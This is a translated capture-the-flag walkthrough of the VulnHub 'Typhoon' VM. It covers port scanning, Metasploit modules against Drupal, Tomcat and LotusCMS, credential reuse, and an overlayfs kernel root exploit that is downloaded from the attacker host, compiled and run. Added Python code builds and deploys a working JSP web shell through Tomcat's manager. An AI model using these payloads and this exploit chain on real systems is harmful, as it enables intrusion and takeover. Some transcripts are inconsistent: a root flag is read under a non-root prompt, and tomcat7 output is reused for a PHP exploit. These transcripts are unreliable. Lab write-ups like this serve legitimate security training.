VM - Cracking Typhoon 1.02

Posted by 青蛙愛輪滑 on 2019-04-14

This article records the process of learning to penetrate Typhoon 1.02. The test VM comes from www.vulnhub.com.
Blog series: CTF-oriented VM cracking series
Download link: Typhoon 1.02



2019-04-13 22:18:40 [Original]

1. Official description

Typhoon Vulnerable VM
Name: Typhoon

Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.

DHCP service: Enabled

2. Walkthrough

Put Kali and the Typhoon Vulnerable VM on the same network segment, then discover the target's IP address:

root@kali:~# netdiscover -r 10.10.10.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 8 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 480
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 10.10.10.1      00:50:56:c0:00:08      5     300  VMware, Inc.
 10.10.10.2      00:50:56:fb:16:b2      1      60  VMware, Inc.
 10.10.10.75     00:50:56:33:73:e3      1      60  VMware, Inc.
 10.10.10.254    00:50:56:e0:63:df      1      60  VMware, Inc.

From the result, the target IP is 10.10.10.75.
Next, scan its ports with nmap:

root@kali:~# nmap -Pn -p- 10.10.10.75
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-13 10:36 EDT
Nmap scan report for 10.10.10.75
Host is up (0.00046s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
631/tcp   open  ipp
993/tcp   open  imaps
995/tcp   open  pop3s
2049/tcp  open  nfs
3306/tcp  open  mysql
5432/tcp  open  postgresql
6379/tcp  open  redis
8080/tcp  open  http-proxy
27017/tcp open  mongod
34675/tcp open  unknown
39236/tcp open  unknown
43404/tcp open  unknown
47275/tcp open  unknown
60926/tcp open  unknown
MAC Address: 00:50:56:33:73:E3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.55 seconds

In the command above, -Pn skips host discovery (no ping probe): some hosts drop ICMP and would otherwise be reported as down and never scanned. -p- is equivalent to -p 1-65535, i.e. every TCP port.
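A full-port sweep without version detection is fast, and the detailed -A scan is then run only on the ports found open (the walkthrough does exactly this by hand with `nmap -p 21 -A` next). As an added Python example, not code from the original post, here is a small helper that parses the nmap output above into the targeted follow-up command and flags the services worth manual attention first. The sample output is a constructed, abridged copy of the scan above, and the watch list of "high value" services is my own choice.

```python
import re

# Constructed sample: an abridged copy of the `nmap -Pn -p- 10.10.10.75`
# output shown in the walkthrough (not a fresh capture).
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-13 10:36 EDT
Nmap scan report for 10.10.10.75
Host is up (0.00046s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
2049/tcp  open  nfs
8080/tcp  open  http-proxy
27017/tcp open  mongod
34675/tcp open  unknown
MAC Address: 00:50:56:33:73:E3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.55 seconds
"""

# One port line of nmap's normal output: "<port>/<proto>  <state>  <service>".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.MULTILINE)

# Services that usually deserve a manual look before anything else
# (assumption: my own list, not anything nmap or the post defines).
HIGH_VALUE = {"ftp", "http", "http-proxy", "nfs", "rpcbind", "mongod", "mysql",
              "postgresql", "redis", "microsoft-ds", "netbios-ssn"}


def parse_open_ports(output):
    """Return [(port, proto, service), ...] for every line whose STATE is 'open'."""
    ports = []
    for m in PORT_LINE.finditer(output):
        port, proto, state, service = m.groups()
        if state == "open":
            ports.append((int(port), proto, service))
    return ports


def followup_scan_command(target, ports):
    """Build the second-phase scan: -A (version, scripts, OS) on the open TCP ports only.

    Running -A across all 65535 ports is slow; sweeping with -p- first and then
    probing only the hits is the two-phase approach the walkthrough uses."""
    tcp = sorted(port for port, proto, _ in ports if proto == "tcp")
    return "nmap -Pn -A -p %s %s" % (",".join(str(p) for p in tcp), target)


def flag_high_value(ports):
    """Subset of (port, service) pairs whose service is on the watch list."""
    return [(port, service) for port, _, service in ports if service in HIGH_VALUE]


if __name__ == "__main__":
    open_ports = parse_open_ports(SAMPLE_NMAP_OUTPUT)
    print(followup_scan_command("10.10.10.75", open_ports))
    for port, service in flag_high_value(open_ports):
        print("look at %d (%s) first" % (port, service))
```

Ports nmap reports as `unknown` (34675 and friends above) are included in the follow-up command on purpose: those are the ones version detection is most likely to identify (here they are typically the NFS/rpcbind helper ports).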
Start with port 21, trying the anonymous account:

root@kali:~# ftp 10.10.10.75
Connected to 10.10.10.75.
220 (vsFTPd 3.0.2)
Name (10.10.10.75:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>

Anonymous login (user anonymous, any password) works, but the directory listing is empty, so there is nothing of value here. Searching for known vulnerabilities in the banner version (vsFTPd 3.0.2) also turns up nothing. A version scan of port 21 confirms the anonymous access:

root@kali:~# nmap -p 21 -A 10.10.10.75
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-13 10:40 EDT
Nmap scan report for 10.10.10.75
Host is up (0.00035s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.10.78
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status

Method 1: Getting a shell through the Drupal CMS

Now turn to port 80.

Next, enumerate directories with dirb:

root@kali:~# dirb http://10.10.10.75
START_TIME: Sat Apr 13 10:46:12 2019
URL_BASE: http://10.10.10.75/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.75/ ----
==> DIRECTORY: http://10.10.10.75/assets/
==> DIRECTORY: http://10.10.10.75/calendar/
+ http://10.10.10.75/cgi-bin/ (CODE:403|SIZE:286)
==> DIRECTORY: http://10.10.10.75/cms/
==> DIRECTORY: http://10.10.10.75/drupal/
+ http://10.10.10.75/index.html (CODE:200|SIZE:3529)
==> DIRECTORY: http://10.10.10.75/javascript/
==> DIRECTORY: http://10.10.10.75/phpmyadmin/
+ http://10.10.10.75/robots.txt (CODE:200|SIZE:37)
+ http://10.10.10.75/server-status (CODE:403|SIZE:291)

Several interesting paths stand out: phpmyadmin, calendar, drupal, cms, and robots.txt.

First, look at robots.txt.
It reveals one more directory, mongoadmin. Start with drupal.

Try to find the version of this CMS.

The site runs Drupal 8, an older release, so search for known vulnerabilities: unpatched Drupal 8 is affected by the Drupalgeddon2 remote code execution bug (CVE-2018-7600), and Metasploit has a module for it:

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOST 10.10.10.75
set TARGETURI /drupal/
exploit

Running it returns a Meterpreter session; drop to a system shell:

meterpreter > id
[-] Unknown command: id.
meterpreter > shell
Process 2915 created.
Channel 0 created.

Grab the kernel information:

uname -a
Linux typhoon.local 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Search exploit-db for this kernel version:

root@kali:~# searchsploit linux 3.13.0
---------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                              |  Path
                                                                                                                            | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation                        | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)   | exploits/linux/local/37293.txt
---------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
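Before pushing a kernel exploit onto a target, it is worth checking that the box actually matches what the exploit needs. As an added Python example (not from the original post or from exploit-db), this checks the kernel release against the window in the searchsploit title, the Ubuntu ABI number (Ubuntu backports fixes within a series without changing the upstream version), the unprivileged user-namespace sysctl that 37292 depends on, and whether gcc is available to compile it on the target. The ABI number that carries the fix is left as a parameter to look up in the relevant Ubuntu Security Notice rather than hard-coded here.

```python
import re

# Window from the exploit-db title "Linux Kernel 3.13.0 < 3.19 (Ubuntu ...)".
VULN_LOW, VULN_HIGH = (3, 13, 0), (3, 19, 0)


def kernel_version(uname_r):
    """Parse `uname -r` output such as '3.13.0-32-generic' into (3, 13, 0, 32).

    The fourth field is Ubuntu's ABI number; two '3.13.0' kernels can differ
    in whether CVE-2015-1328 is fixed, so it has to be kept."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:-(\d+))?", uname_r)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % uname_r)
    major, minor, patch, abi = m.groups()
    return (int(major), int(minor), int(patch), int(abi or 0))


def in_overlayfs_window(uname_r):
    """True if the upstream version sits in the range the exploit title lists."""
    return VULN_LOW <= kernel_version(uname_r)[:3] < VULN_HIGH


def userns_allowed(sysctl_text):
    """37292 starts with unshare(CLONE_NEWUSER), so unprivileged user namespaces
    must be enabled. Pass the contents of
    /proc/sys/kernel/unprivileged_userns_clone, or None if the file is absent
    (assumption: no such sysctl means no Ubuntu-specific restriction)."""
    return sysctl_text is None or sysctl_text.strip() == "1"


def triage(uname_r, sysctl_text, have_gcc, fixed_abi=None):
    """Return the reasons *not* to expect 37292 to work; an empty list means try it.

    fixed_abi is the Ubuntu ABI number that first carries the fix for this
    series (from the relevant USN); None skips that check."""
    reasons = []
    version = kernel_version(uname_r)
    if not in_overlayfs_window(uname_r):
        reasons.append("kernel outside the 3.13.0 <= v < 3.19 window")
    if fixed_abi is not None and version[3] >= fixed_abi:
        reasons.append("ABI %d already carries the fix" % version[3])
    if not userns_allowed(sysctl_text):
        reasons.append("unprivileged user namespaces disabled")
    if not have_gcc:
        reasons.append("no gcc on target: build the binary elsewhere and copy it over")
    return reasons


if __name__ == "__main__":
    # Run on the target itself: reads the live kernel release, sysctl and gcc presence.
    import os
    import shutil
    release = os.uname().release
    path = "/proc/sys/kernel/unprivileged_userns_clone"
    sysctl = open(path).read() if os.path.exists(path) else None
    print(release, triage(release, sysctl, shutil.which("gcc") is not None) or "looks worth trying")
```

The walkthrough's target (3.13.0-32-generic, with gcc installed) passes every check, which is why the same compile-and-run sequence works in all four methods below.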

Serve the exploit source from Kali with a one-line HTTP server (10.10.10.78 is the Kali box):

root@kali:~# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
root@kali:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

On the target:

cd /tmp
wget http://10.10.10.78/37292.c
gcc 37292.c -o 37292
chmod +x 37292
./37292
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
# ls
root-flag
# cat root-flag
<Congrats!>

Typhoon_r00t3r!

</Congrats!>

Root flag obtained.

Method 2: Getting a shell through MongoDB

The nmap scan showed port 80 open, and dirb showed a robots.txt, which points at the mongoadmin directory.

Visit http://10.10.10.75/mongoadmin/ (port 27017 is open as well, so if mongod accepts unauthenticated connections the same data can also be read directly with the mongo shell; worth checking).

The admin interface exposes a username and password:

在這裡插入圖片描述
[username] => typhoon
[password] => 789456123

Try the same username/password against SSH (credential reuse), then repeat the kernel exploit:

root@kali:~# ssh typhoon@10.10.10.75
typhoon@typhoon:~$ uname -a
Linux typhoon.local 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
typhoon@typhoon:~$ wget http://10.10.10.78/37292.c
typhoon@typhoon:~$ gcc 37292.c -o rootshell
typhoon@typhoon:~$ chmod 777 rootshell
typhoon@typhoon:~$ ./rootshell
typhoon@typhoon:~$ cd /root
typhoon@typhoon:~$ ls
typhoon@typhoon:~$ cat root-flag
<Congrats!>
Typhoon_r00t3r!
</Congrats!>

Root flag obtained.

Method 3: Getting a shell through Tomcat

The nmap scan showed port 8080 open.

Visit the manager application at http://10.10.10.75:8080/manager
The default credentials work:

[username]:tomcat
[password]:tomcat

Once logged in, the manager offers a WAR upload form, which means we can deploy a WAR containing a JSP web shell. Test this with msf:

use exploit/multi/http/tomcat_mgr_upload
set rhost 10.10.10.75
set rport 8080
set httpusername tomcat
set httppassword tomcat
exploit

Get a shell (it runs as the Tomcat service user, not root):

meterpreter > shell
Process 1 created.
Channel 1 created.

id
uid=116(tomcat7) gid=126(tomcat7) groups=126(tomcat7)
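The manual equivalent of the Metasploit module, as an added Python example (not code from the original post, from Metasploit, or from Tomcat): it builds a WAR containing a one-file JSP shell and the authenticated PUT that Tomcat's text manager accepts for deployment. It assumes the `tomcat` account holds the manager-script role (the text interface needs it; the HTML form the msf module uses needs manager-gui instead); the context path /typhoon and the JSP name cmd.jsp are my choices.

```python
import base64
import io
import urllib.parse
import urllib.request
import zipfile

# Minimal JSP web shell: runs ?cmd=... and echoes its stdout. Tomcat compiles a
# bare JSP on first request, so the WAR needs no web.xml or compiled classes.
JSP_SHELL = r"""<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) out.println(line);
}
%>
"""


def build_war(jsp_name="cmd.jsp", jsp_source=JSP_SHELL):
    """Return the bytes of a WAR (a zip archive) holding a single JSP at its root."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """Map entry name -> bytes, to inspect a WAR before deploying it."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return {name: war.read(name) for name in war.namelist()}


def deploy_request(base_url, context_path, war_bytes, username, password):
    """Build the PUT Tomcat's text manager accepts: /manager/text/deploy?path=/ctx.

    The WAR goes in the request body; HTTP Basic auth carries the manager
    credentials. update=true replaces an existing app at that path."""
    query = urllib.parse.urlencode({"path": context_path, "update": "true"})
    req = urllib.request.Request(base_url.rstrip("/") + "/manager/text/deploy?" + query,
                                 data=war_bytes, method="PUT")
    token = base64.b64encode(("%s:%s" % (username, password)).encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    req.add_header("Content-Type", "application/octet-stream")
    return req


def shell_url(base_url, context_path, command, jsp_name="cmd.jsp"):
    """URL that runs `command` through the deployed JSP."""
    return "%s%s/%s?%s" % (base_url.rstrip("/"), context_path, jsp_name,
                           urllib.parse.urlencode({"cmd": command}))


def deploy_and_run(base_url, context_path, username, password, command,
                   opener=urllib.request.urlopen):
    """Deploy the shell and run one command; returns (manager reply, command output).

    A successful deploy answers 'OK - Deployed application at context path /ctx'."""
    req = deploy_request(base_url, context_path, build_war(), username, password)
    with opener(req) as resp:
        status = resp.read().decode().strip()
    with opener(shell_url(base_url, context_path, command)) as resp:
        return status, resp.read().decode()


if __name__ == "__main__":
    print(deploy_and_run("http://10.10.10.75:8080", "/typhoon", "tomcat", "tomcat", "id"))
```

When finished, remove the application with an authenticated request to /manager/text/undeploy?path=/typhoon so the shell is not left behind on the target.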

Privilege escalation with the same overlayfs exploit (change to /tmp first so the download and the compile happen in the same writable directory):

cd /tmp
wget http://10.10.10.78/37292.c
gcc 37292.c -o 37292
chmod +x 37292
./37292
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
# ls
root-flag
# cat root-flag
<Congrats!>
Typhoon_r00t3r!
</Congrats!>

Root flag obtained.

Method 4: Getting a shell through LotusCMS

The dirb scan also found a cms directory; visiting it shows a LotusCMS install.

A Google search shows that LotusCMS has a remote command execution vulnerability (an eval() injection in its PHP router), and Metasploit has a module for it.

使用 msf 進行測試

use exploit/multi/http/lcms_php_exec
set rhost 10.10.10.75
set uri /cms
exploit

Get a shell. Note that a PHP exploit runs as the web server's user, so expect www-data here rather than the tomcat7 identity shown below, which matches the Tomcat session above; the root shell's supplementary group 33(www-data) further down is consistent with www-data.

meterpreter > shell
Process 1 created.
Channel 1 created.

id
uid=116(tomcat7) gid=126(tomcat7) groups=126(tomcat7)

Privilege escalation, again changing to /tmp before downloading and compiling:

cd /tmp
wget http://10.10.10.78/37292.c
gcc 37292.c -o 37292
chmod +x 37292
./37292
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
# ls
root-flag
# cat root-flag
<Congrats!>
Typhoon_r00t3r!
</Congrats!>

Root flag obtained.
